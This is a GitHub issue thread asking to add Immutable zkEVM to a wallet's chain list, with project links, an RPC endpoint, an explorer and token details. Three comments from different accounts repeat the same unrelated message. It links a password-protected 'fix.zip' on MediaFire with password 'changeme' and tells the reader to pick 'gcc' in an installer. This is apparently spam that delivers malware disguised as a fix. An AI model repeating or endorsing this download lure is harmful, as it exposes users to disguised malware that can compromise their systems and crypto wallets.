### ISSUE TITLE
[Immutable zkEVM] Add support for Immutable zkEVM

### ISSUE THREAD

**Issue by Mabel-Nguyen** [Koniverse/SubWallet-ChainList#293]
**If this is your first time integrating, the following information is required**
- A short introduction about your project/ your team: Immutable zkEVM is a chain that provides tools and resources for advanced gameplay
- Document: https://docs.immutable.com/docs/overview/
- Social media links ([X](https://x.com/Immutable), [Discord](https://discord.com/invite/CYsjMdctsP), [Website](https://www.immutable.com/products/immutable-zkevm), [LinkedIn](https://www.linkedin.com/company/immutable-1/),...)
- Github: https://github.com/Immutable

**If you want to integrate a chain, you would need to provide**
- Name of the blockchain: Immutable zkEVM Mainnet
- Type of the blockchain: zkEVM
- Blockchain providers: https://rpc.immutable.com/
- Metadata of the blockchain: https://docs.immutable.com/platform/zkEVM/chain-config
- Logo of the blockchain: https://www.figma.com/design/z9s6aLTLoUdjMwoXLyWcPz/01.SubWallet-Project-Logo?node-id=7294-63&t=KWgFKymPt178oHZu-4
- Block explorers: https://explorer.immutable.com/
- Token: IMX (Immutable)
    - Logo: https://www.figma.com/design/z9s6aLTLoUdjMwoXLyWcPz/01.SubWallet-Project-Logo?node-id=7294-134&t=KWgFKymPt178oHZu-4
    - Coingecko: https://www.coingecko.com/en/coins/immutable-x

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Sokol142196** [comment]
Resolved in https://github.com/Koniverse/SubWallet-Extension/issues/3518
